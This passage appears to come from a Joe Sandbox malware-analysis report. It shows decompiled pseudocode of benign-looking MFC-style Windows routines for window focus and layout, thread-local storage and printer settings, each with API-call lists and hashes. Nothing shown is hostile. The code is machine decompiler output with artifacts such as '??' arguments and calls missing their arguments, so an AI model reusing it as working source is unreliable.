                  							goto L25;
                  						}
                  					}
                  				}
                  				_t64 = E0040F8F7(_t89, _t85);
                  				_t81 = _t89;
                  				_t75 = _t64;
                  				if(E00410A43(_t75, _t89) == 0) {
                  					L6:
                  					_v8 = _v8 | 0xffffffff;
                  					goto L7;
                  				} else {
                  					if(_t75 == 0) {
                  						E00413DD0(_t81);
                  					}
                  					_t81 = _t75;
                  					if(E00411E53(_t75) != 0) {
                  						L7:
                  						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                  						if(_t66 != 0) {
                  							_t88 =  *((intOrPtr*)(_t66 + 0x20));
                  						} else {
                  							_t88 = 0;
                  						}
                  						_t68 = E0040E20E(_t75, _t81, GetCapture());
                  						if(_t68 != _t89) {
                  							if(_t68 != 0) {
                  								_t83 =  *((intOrPtr*)(_t68 + 0x20));
                  							} else {
                  								_t83 = 0;
                  							}
                  							if(_t83 != _t88 && E0040F8F7(_t68, _t88) == _t75) {
                  								_v8 = _v8 | 0xffffffff;
                  							}
                  						}
                  						goto L18;
                  					}
                  					goto L6;
                  				}
                  			}

                  APIs
                  • GetKeyState.USER32(00000001), ref: 0042313A
                  • GetCursorPos.USER32(?), ref: 00423159
                  • ScreenToClient.USER32(?,?), ref: 00423166
                  • GetCapture.USER32 ref: 004231BC
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • ClientToScreen.USER32(?,?), ref: 00423203
                  • WindowFromPoint.USER32(?,?), ref: 0042320F
                  • IsChild.USER32(?,00000000), ref: 00423224
                  • KillTimer.USER32(?,0000E001), ref: 00423261
                  • KillTimer.USER32(?,0000E000), ref: 0042327D
                    • Part of subcall function 00410A43: GetForegroundWindow.USER32 ref: 00410A57
                    • Part of subcall function 00410A43: GetLastActivePopup.USER32(?), ref: 00410A68
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorException@8ForegroundFromLastPointPopupStateThrow
                  • String ID:
                  • API String ID: 4177878703-0
                  • Opcode ID: f29916a0f4b2eaa4022af138b3364e60a3bde53017dbd197dab8f31c215de712
                  • Instruction ID: 79c1a7b2d7f8082b187d282f0430c5f361da3f181239cd66975711b34441f4d9
                  • Opcode Fuzzy Hash: f29916a0f4b2eaa4022af138b3364e60a3bde53017dbd197dab8f31c215de712
                  • Instruction Fuzzy Hash: F441B231700215DFCB209F65EC48AAE7BB5BF54315F6042AAE461D32A0DB3CDE51CB19
                  Uniqueness

                  Uniqueness Score: 1.23%

                  C-Code - Quality: 83%
                  			E0041F356(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t36;
                  				void* _t39;
                  				long _t41;
                  				void* _t42;
                  				long _t47;
                  				void* _t53;
                  				signed int _t55;
                  				long* _t62;
                  				struct _CRITICAL_SECTION* _t64;
                  				void* _t65;
                  				void* _t66;
                  
                  				_push(0x10);
                  				E0042925E(E004393D9, __ebx, __edi, __esi);
                  				_t62 = __ecx;
                  				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                  				_t64 = __ecx + 0x1c;
                  				 *(_t66 - 0x14) = _t64;
                  				EnterCriticalSection(_t64);
                  				_t36 =  *(_t66 + 8);
                  				if(_t36 <= 0 || _t36 >= _t62[3]) {
                  					_push(_t64);
                  				} else {
                  					_t65 = TlsGetValue( *_t62);
                  					if(_t65 == 0) {
                  						 *(_t66 - 4) = 0;
                  						_t39 = E0041EFD6(0x10);
                  						__eflags = _t39;
                  						if(__eflags == 0) {
                  							_t65 = 0;
                  							__eflags = 0;
                  						} else {
                  							 *_t39 = 0x4406e4;
                  							_t65 = _t39;
                  						}
                  						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                  						_t51 =  &(_t62[5]);
                  						 *(_t65 + 8) = 0;
                  						 *(_t65 + 0xc) = 0;
                  						E0041F108( &(_t62[5]), _t65);
                  						goto L5;
                  					} else {
                  						_t55 =  *(_t66 + 8);
                  						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                  							L5:
                  							_t75 =  *(_t65 + 0xc);
                  							if( *(_t65 + 0xc) != 0) {
                  								_t41 = E0041547B(0, _t51, _t62, _t65, __eflags, _t62[3], 4);
                  								_t53 = 2;
                  								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                  							} else {
                  								_t47 = E0041547B(0, _t51, _t62, _t65, _t75, _t62[3], 4);
                  								_pop(_t53);
                  								_t42 = LocalAlloc(0, _t47);
                  							}
                  							if(_t42 == 0) {
                  								LeaveCriticalSection( *(_t66 - 0x14));
                  								_t42 = E00413D98(_t53);
                  							}
                  							 *(_t65 + 0xc) = _t42;
                  							E004281D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                  							 *(_t65 + 8) = _t62[3];
                  							TlsSetValue( *_t62, _t65);
                  							_t55 =  *(_t66 + 8);
                  						}
                  					}
                  					_t36 =  *(_t65 + 0xc);
                  					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                  						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                  					}
                  					_push( *(_t66 - 0x14));
                  				}
                  				LeaveCriticalSection();
                  				return E00429303(_t36);
                  			}

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041F35D
                  • EnterCriticalSection.KERNEL32(?,00000010,0041F619,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F36E
                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1,?,?,004382C8), ref: 0041F38C
                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F3C0
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F42C
                  • _memset.LIBCMT ref: 0041F44B
                  • TlsSetValue.KERNEL32(?,00000000), ref: 0041F45C
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1,?,?,004382C8), ref: 0041F47D
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                  • String ID:
                  • API String ID: 1891723912-0
                  • Opcode ID: 17063f34dc344c93a15c83e00e71e723195f7900d4713094e52f02ed4555f1c6
                  • Instruction ID: c53f380656f35289a2d3609ec69209c8b082339f46005d3b10dfd96134c05814
                  • Opcode Fuzzy Hash: 17063f34dc344c93a15c83e00e71e723195f7900d4713094e52f02ed4555f1c6
                  • Instruction Fuzzy Hash: FB318070500605EFCB10EF61D885CABB7B4FF14310B10C53FE99696660CB38AD96CB89
                  Uniqueness

                  Uniqueness Score: 3.53%

                  C-Code - Quality: 82%
                  			E00413AC6(void* __ecx, void* __edx, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                  				signed int _v8;
                  				short _v10;
                  				char _v528;
                  				struct HWND__* _v532;
                  				signed int _v536;
                  				long _v540;
                  				struct HWND__* _v544;
                  				intOrPtr _v548;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t36;
                  				signed int _t55;
                  				intOrPtr _t58;
                  				long _t61;
                  				struct HWND__* _t64;
                  				WCHAR* _t65;
                  				void* _t66;
                  				void* _t68;
                  				void* _t72;
                  				void* _t73;
                  				long _t74;
                  				void* _t75;
                  				void* _t76;
                  				signed int _t78;
                  				void* _t79;
                  				signed int _t83;
                  
                  				_t72 = __edx;
                  				_t81 = _t83;
                  				_t36 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t36 ^ _t83;
                  				_t74 = _a4;
                  				_t78 = 0;
                  				_v548 = _a8;
                  				E004139DB(0);
                  				_t68 = _t73;
                  				_t64 = E00413A14(0,  &_v532);
                  				_v544 = _t64;
                  				if(_t64 != _v532) {
                  					EnableWindow(_t64, 1);
                  				}
                  				_v540 = _v540 & _t78;
                  				GetWindowThreadProcessId(_t64,  &_v540);
                  				if(_t64 == 0 || _v540 != GetCurrentProcessId()) {
                  					L7:
                  					__eflags = _t74;
                  					if(__eflags != 0) {
                  						_t12 = _t74 + 0x78; // 0x78
                  						_t78 = _t12;
                  					}
                  					goto L9;
                  				} else {
                  					_t61 = SendMessageW(_t64, 0x376, 0, 0);
                  					if(_t61 == 0) {
                  						goto L7;
                  					} else {
                  						_t78 = _t61;
                  						L9:
                  						_v536 = _v536 & 0x00000000;
                  						if(_t78 != 0) {
                  							_v536 =  *_t78;
                  							_t58 = _a16;
                  							if(_t58 != 0) {
                  								 *_t78 = _t58 + 0x30000;
                  							}
                  						}
                  						if((_a12 & 0x000000f0) == 0) {
                  							_t55 = _a12 & 0x0000000f;
                  							if(_t55 <= 1) {
                  								_t23 =  &_a12;
                  								 *_t23 = _a12 | 0x00000030;
                  								__eflags =  *_t23;
                  							} else {
                  								if(_t55 + 0xfffffffd <= 1) {
                  									_a12 = _a12 | 0x00000020;
                  								}
                  							}
                  						}
                  						_v528 = 0;
                  						_t98 = _t74;
                  						if(_t74 == 0) {
                  							_t65 =  &_v528;
                  							_t74 = 0x104;
                  							__eflags = GetModuleFileNameW(0, _t65, 0x104) - 0x104;
                  							if(__eflags == 0) {
                  								__eflags = 0;
                  								_v10 = 0;
                  							}
                  						} else {
                  							_t65 =  *(_t74 + 0x50);
                  						}
                  						_push(_a12);
                  						_push(_t65);
                  						_push(_v548);
                  						_push(_v544);
                  						_t75 = E0040CB2A(_t65, _t68, _t74, _t78, _t98);
                  						if(_t78 != 0) {
                  							 *_t78 = _v536;
                  						}
                  						if(_v532 != 0) {
                  							EnableWindow(_v532, 1);
                  						}
                  						E004139DB(1);
                  						_pop(_t76);
                  						_pop(_t79);
                  						_pop(_t66);
                  						return E00427DFF(_t75, _t66, _v8 ^ _t81, _t72, _t76, _t79);
                  					}
                  				}
                  			}

                  APIs
                    • Part of subcall function 00413A14: GetParent.USER32(?), ref: 00413A68
                    • Part of subcall function 00413A14: GetLastActivePopup.USER32(?), ref: 00413A79
                    • Part of subcall function 00413A14: IsWindowEnabled.USER32(?), ref: 00413A8D
                    • Part of subcall function 00413A14: EnableWindow.USER32(?,00000000), ref: 00413AA0
                  • EnableWindow.USER32(?,00000001), ref: 00413B13
                  • GetWindowThreadProcessId.USER32(?,?), ref: 00413B27
                  • GetCurrentProcessId.KERNEL32 ref: 00413B31
                  • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 00413B49
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00413BC5
                  • EnableWindow.USER32(00000000,00000001), ref: 00413C0C
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                  • String ID: 0
                  • API String ID: 1877664794-4108050209
                  • Opcode ID: 828f8a67a036c3dfd865f62085fa5df72546dff608ea06814d0ef942e0615404
                  • Instruction ID: b43ff5600c3387bb6847945249b250cbf2826ec3f7bdb4896dd086ef5827ba55
                  • Opcode Fuzzy Hash: 828f8a67a036c3dfd865f62085fa5df72546dff608ea06814d0ef942e0615404
                  • Instruction Fuzzy Hash: 8241C471A442189BCB20DF25DC89BDAB7B4EF14715F10059AF419E7291E774EFC08B98
                  Uniqueness

                  Uniqueness Score: 0.32%

                  C-Code - Quality: 66%
                  			E0040B9B5(intOrPtr _a4, intOrPtr* _a8) {
                  				void _v20;
                  				int _t15;
                  				int _t19;
                  				intOrPtr* _t27;
                  				void* _t31;
                  				intOrPtr* _t37;
                  				intOrPtr _t40;
                  
                  				if(E0040B7ED() == 0) {
                  					if(_a4 != 0x12340042) {
                  						L13:
                  						_t15 = 0;
                  						L14:
                  						return _t15;
                  					}
                  					_t27 = _a8;
                  					if(_t27 == 0 ||  *_t27 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                  						goto L13;
                  					} else {
                  						 *((intOrPtr*)(_t27 + 4)) = 0;
                  						 *((intOrPtr*)(_t27 + 8)) = 0;
                  						 *((intOrPtr*)(_t27 + 0xc)) = GetSystemMetrics(0);
                  						_t19 = GetSystemMetrics(1);
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						 *(_t27 + 0x10) = _t19;
                  						 *((intOrPtr*)(_t27 + 0x24)) = 1;
                  						if( *_t27 >= 0x68) {
                  							MultiByteToWideChar(0, 0, "DISPLAY", 0xffffffff, _t27 + 0x28, 0x20);
                  						}
                  						_t15 = 1;
                  						goto L14;
                  					}
                  				}
                  				_t37 = _a8;
                  				_t31 =  *0x44f5c0(_a4, _t37);
                  				if(_t31 != 0) {
                  					_t40 =  *0x44f5d0; // 0x0
                  					if(_t40 == 0 &&  *_t37 >= 0x68) {
                  						_t3 = _t37 + 0x28; // 0x28
                  						MultiByteToWideChar(0, 0, _t3, 0xffffffff, _t3, 0x20);
                  					}
                  				}
                  				return _t31;
                  			}











                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 0040B9F5
                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0040BA1F
                  • GetSystemMetrics.USER32(00000000), ref: 0040BA36
                  • GetSystemMetrics.USER32(00000001), ref: 0040BA3D
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 0040BA68
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                  • String ID: B$DISPLAY
                  • API String ID: 381819527-3316187204
                  • Opcode ID: 18cf5bd3d32a6fc675a34ba076df6cdcb9c96563850dcf6491ffc36bc25d5e89
                  • Instruction ID: fca5cd48419685536342a7f9a56001a02b268863b5be9df2b18fe92301318a5e
                  • Opcode Fuzzy Hash: 18cf5bd3d32a6fc675a34ba076df6cdcb9c96563850dcf6491ffc36bc25d5e89
                  • Instruction Fuzzy Hash: 8921F171644321EBDF208F21CC84B6B7A68EB0A760F004236FD15AA2D1D774D900CBED
                  Uniqueness

                  Uniqueness Score: 0.61%

                  C-Code - Quality: 92%
                  			E0040E5D3(int __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
                  				int _v8;
                  				intOrPtr _v12;
                  				int _v16;
                  				int _v20;
                  				struct tagRECT _v36;
                  				void* _v40;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t61;
                  				int _t62;
                  				signed int _t64;
                  				int _t72;
                  				intOrPtr* _t84;
                  				struct HWND__* _t90;
                  
                  				_t72 = __ecx;
                  				_t74 = _a28;
                  				_v8 = 0;
                  				_v12 = _a28;
                  				_v16 = 0;
                  				_v20 = 0;
                  				if(_a24 == 0) {
                  					GetClientRect( *(__ecx + 0x20),  &_v36);
                  				} else {
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  				}
                  				_t61 = _a16 & 0xffff7fff;
                  				_a24 = _t61;
                  				if(_t61 == 1) {
                  					_t13 =  &_v40;
                  					 *_t13 = _v40 & 0x00000000;
                  					__eflags =  *_t13;
                  				} else {
                  					_v40 = BeginDeferWindowPos(8);
                  				}
                  				_t62 = GetTopWindow( *(_t72 + 0x20));
                  				while(1) {
                  					_t90 = _t62;
                  					if(_t90 == 0) {
                  						break;
                  					}
                  					_t72 = GetDlgCtrlID(_t90);
                  					_t64 = E0040E23A(_t72, _t74, 0, _t90, __eflags, _t90);
                  					__eflags = _t72 - _a12;
                  					if(__eflags != 0) {
                  						__eflags = _t72 - _a4;
                  						if(__eflags >= 0) {
                  							__eflags = _t72 - _a8;
                  							if(__eflags <= 0) {
                  								__eflags = _t64;
                  								if(__eflags != 0) {
                  									SendMessageW(_t90, 0x361, 0,  &_v40);
                  								}
                  							}
                  						}
                  					} else {
                  						_v8 = _t90;
                  					}
                  					_t62 = GetWindow(_t90, 2);
                  				}
                  				if(_a24 != 1) {
                  					__eflags = _a12;
                  					if(_a12 != 0) {
                  						__eflags = _v8;
                  						if(_v8 != 0) {
                  							_t62 = E0040E20E(_t72, _t74, _v8);
                  							__eflags = _a24 - 2;
                  							if(_a24 == 2) {
                  								_t84 = _a20;
                  								_v36.left = _v36.left +  *_t84;
                  								_v36.top = _v36.top +  *((intOrPtr*)(_t84 + 4));
                  								_v36.right = _v36.right -  *((intOrPtr*)(_t84 + 8));
                  								_t45 =  &(_v36.bottom);
                  								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t84 + 0xc));
                  								__eflags =  *_t45;
                  							}
                  							__eflags = _a16 & 0x00008000;
                  							if((_a16 & 0x00008000) == 0) {
                  								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
                  								_t62 = E0040C357( &_v40, _v8,  &_v36);
                  							}
                  						}
                  					}
                  					__eflags = _v40;
                  					if(_v40 != 0) {
                  						_t62 = EndDeferWindowPos(_v40);
                  					}
                  				} else {
                  					if(_a28 == 0) {
                  						_t62 = _a20;
                  						 *((intOrPtr*)(_t62 + 8)) = _v20;
                  						 *((intOrPtr*)(_t62 + 4)) = 0;
                  						 *_t62 = 0;
                  						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
                  					} else {
                  						_t62 = CopyRect(_a20,  &_v36);
                  					}
                  				}
                  				return _t62;
                  			}



















                  APIs
                  • GetClientRect.USER32(?,?), ref: 0040E608
                  • BeginDeferWindowPos.USER32(00000008), ref: 0040E620
                  • GetTopWindow.USER32(?), ref: 0040E632
                  • GetDlgCtrlID.USER32(00000000), ref: 0040E63D
                  • SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 0040E66E
                  • GetWindow.USER32(00000000,00000002), ref: 0040E677
                  • CopyRect.USER32(?,?), ref: 0040E695
                  • EndDeferWindowPos.USER32(00000000), ref: 0040E712
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                  • String ID:
                  • API String ID: 1228040700-0
                  • Opcode ID: 67fd11745653930679c376aaf3d6b4f1722f198f74043795e1cb311766914da4
                  • Instruction ID: b7f4198c190bd397e805bd7f4763771c5cc0ce2e7b37bf3c3ca447f4290ee0df
                  • Opcode Fuzzy Hash: 67fd11745653930679c376aaf3d6b4f1722f198f74043795e1cb311766914da4
                  • Instruction Fuzzy Hash: 8E417B71900209DFCF10DFA5D8888EEB7B5FF68300B10497AE801B7290C77A9960CFA9
                  Uniqueness

                  Uniqueness Score: 0.43%

                  C-Code - Quality: 91%
                  			E004130CD(intOrPtr __ecx, void* __eflags) {
                  				int _v8;
                  				struct HWND__* _v12;
                  				intOrPtr _v16;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t47;
                  				intOrPtr _t50;
                  				intOrPtr _t51;
                  				void* _t53;
                  				int _t55;
                  				void* _t57;
                  				intOrPtr* _t63;
                  				int _t65;
                  				void* _t69;
                  				void* _t84;
                  				void* _t86;
                  				intOrPtr _t87;
                  				void* _t90;
                  
                  				_t90 = __eflags;
                  				_t87 = __ecx;
                  				E004281D0(_t84,  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x74)) + 0x1c)) + (lstrlenW( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1) * 2, 0,  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x74)) + 0x20)) - lstrlenW( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1 +  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x74)) + 0x20)) - lstrlenW( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1);
                  				_t47 = GetFocus();
                  				_t85 =  *((intOrPtr*)(_t87 + 0x74));
                  				_t73 = _t87;
                  				_v12 = _t47;
                  				_v8 = 0;
                  				 *( *((intOrPtr*)(_t87 + 0x74)) + 4) = E0041E7B8(0, _t87, _t90);
                  				E0040E2C7(0,  *((intOrPtr*)(_t87 + 0x74)), _t90);
                  				_t50 =  *((intOrPtr*)(_t87 + 0x74));
                  				_t69 = EnableWindow;
                  				if( *(_t50 + 4) != 0) {
                  					_t65 = IsWindowEnabled( *(_t50 + 4));
                  					_t92 = _t65;
                  					if(_t65 != 0) {
                  						_v8 = 1;
                  						EnableWindow( *( *((intOrPtr*)(_t87 + 0x74)) + 4), 0);
                  					}
                  				}
                  				_t51 = E00420285(_t69, _t85, _t87, _t92);
                  				_v16 = _t51;
                  				if( *((intOrPtr*)(_t87 + 0x78)) == 1) {
                  					L6:
                  					E00410178(_t69, __eflags, _t87);
                  					goto L7;
                  				} else {
                  					_t73 =  *((intOrPtr*)(_t87 + 0x74));
                  					if(( *( *((intOrPtr*)(_t87 + 0x74)) + 0x34) & 0x00080000) == 0) {
                  						goto L6;
                  					}
                  					 *((intOrPtr*)(_t51 + 0x18)) = _t87;
                  					L7:
                  					_t95 =  *((intOrPtr*)(_t87 + 0x78)) - 1;
                  					if( *((intOrPtr*)(_t87 + 0x78)) != 1) {
                  						__eflags =  *((intOrPtr*)(_t87 + 0x88));
                  						_push( *((intOrPtr*)(_t87 + 0x74)));
                  						if(__eflags == 0) {
                  							_t53 = E004126F5(_t73);
                  						} else {
                  							_t53 = E004126D9(_t73);
                  						}
                  						_t86 = _t53;
                  					} else {
                  						E00412AE3(_t69, _t87, _t85, _t87, _t95);
                  						_t63 =  *((intOrPtr*)(_t87 + 0x80));
                  						_t86 = (0 |  *((intOrPtr*)( *_t63 + 0xc))(_t63,  *( *((intOrPtr*)(_t87 + 0x74)) + 4)) != 0x00000000) + 1;
                  					}
                  					 *(_v16 + 0x18) =  *(_v16 + 0x18) & 0x00000000;
                  					if(_v8 != 0) {
                  						EnableWindow( *( *((intOrPtr*)(_t87 + 0x74)) + 4), 1);
                  					}
                  					_t55 = IsWindow(_v12);
                  					_t98 = _t55;
                  					if(_t55 != 0) {
                  						SetFocus(_v12);
                  					}
                  					E0041E7F4(_t69, _t87, _t86, _t87, _t98);
                  					if(_t86 == 0) {
                  						_t57 = 2;
                  						return _t57;
                  					} else {
                  						return _t86;
                  					}
                  				}
                  			}
























                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000000,00000001,?,?,?,000000B0,A6E2BCA1), ref: 004130E0
                  • _memset.LIBCMT ref: 004130FC
                  • GetFocus.USER32 ref: 00413104
                    • Part of subcall function 0040E2C7: UnhookWindowsHookEx.USER32(?), ref: 0040E2F7
                  • IsWindowEnabled.USER32(00000006), ref: 00413133
                  • EnableWindow.USER32(00000006,00000000), ref: 0041314C
                  • EnableWindow.USER32(00000006,00000001), ref: 004131CD
                  • IsWindow.USER32(00000000), ref: 004131D2
                  • SetFocus.USER32(00000000), ref: 004131DF
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$EnableFocus$EnabledHookUnhookWindows_memsetlstrlen
                  • String ID:
                  • API String ID: 3424750955-0
                  • Opcode ID: e8ab3cbe979cc04d228fefbcca429c0d9c2cb50ca7a4107e7af1efe6523722b4
                  • Instruction ID: 1e38beaecc91a3a07e979ff4f7f181897a2b97c0ab68874d8d63fe70394f3af5
                  • Opcode Fuzzy Hash: e8ab3cbe979cc04d228fefbcca429c0d9c2cb50ca7a4107e7af1efe6523722b4
                  • Instruction Fuzzy Hash: EF410230600600EFCB229F75C949B9ABBF5FF44705F14856EE446872A1CB79ED91CB49
                  Uniqueness

                  Uniqueness Score: 7.75%

                  C-Code - Quality: 93%
                  			E0041CE1B(void* __ecx, short* _a4) {
                  				void* _v8;
                  				void* _t17;
                  				void* _t23;
                  				void* _t37;
                  
                  				_push(__ecx);
                  				_t37 = __ecx;
                  				_t17 =  *(__ecx + 0x74);
                  				if(_t17 != 0) {
                  					_t17 = lstrcmpW(GlobalLock(_t17) + ( *(_t18 + 2) & 0x0000ffff) * 2, _a4);
                  					if(_t17 == 0) {
                  						_t17 = OpenPrinterW(_a4,  &_v8, 0);
                  						if(_t17 != 0) {
                  							_t21 =  *(_t37 + 0x70);
                  							if( *(_t37 + 0x70) != 0) {
                  								E00420981(_t21);
                  							}
                  							_t23 = GlobalAlloc(0x42, DocumentPropertiesW(0, _v8, _a4, 0, 0, 0));
                  							 *(_t37 + 0x70) = _t23;
                  							if(DocumentPropertiesW(0, _v8, _a4, GlobalLock(_t23), 0, 2) != 1) {
                  								E00420981( *(_t37 + 0x70));
                  								 *(_t37 + 0x70) = 0;
                  							}
                  							_t17 = ClosePrinter(_v8);
                  						}
                  					}
                  				}
                  				return _t17;
                  			}








                  APIs
                  • GlobalLock.KERNEL32(?,?,?,?,?,?,0040FA4A,?), ref: 0041CE3A
                  • lstrcmpW.KERNEL32(00000000,?,?,?,?,?,?,0040FA4A,?), ref: 0041CE47
                  • OpenPrinterW.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,0040FA4A,?), ref: 0041CE59
                  • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,0040FA4A,?), ref: 0041CE79
                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0041CE81
                  • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0040FA4A,?), ref: 0041CE8B
                  • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,0040FA4A,?), ref: 0041CE98
                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,0040FA4A,?), ref: 0041CEB0
                    • Part of subcall function 00420981: GlobalFlags.KERNEL32(?), ref: 00420990
                    • Part of subcall function 00420981: GlobalUnlock.KERNEL32(?,?,?,?,0041D54A,?,00000414,004084DF,?,?,004084AF), ref: 004209A2
                    • Part of subcall function 00420981: GlobalFree.KERNEL32(?), ref: 004209AD
                  Memory Dump Source
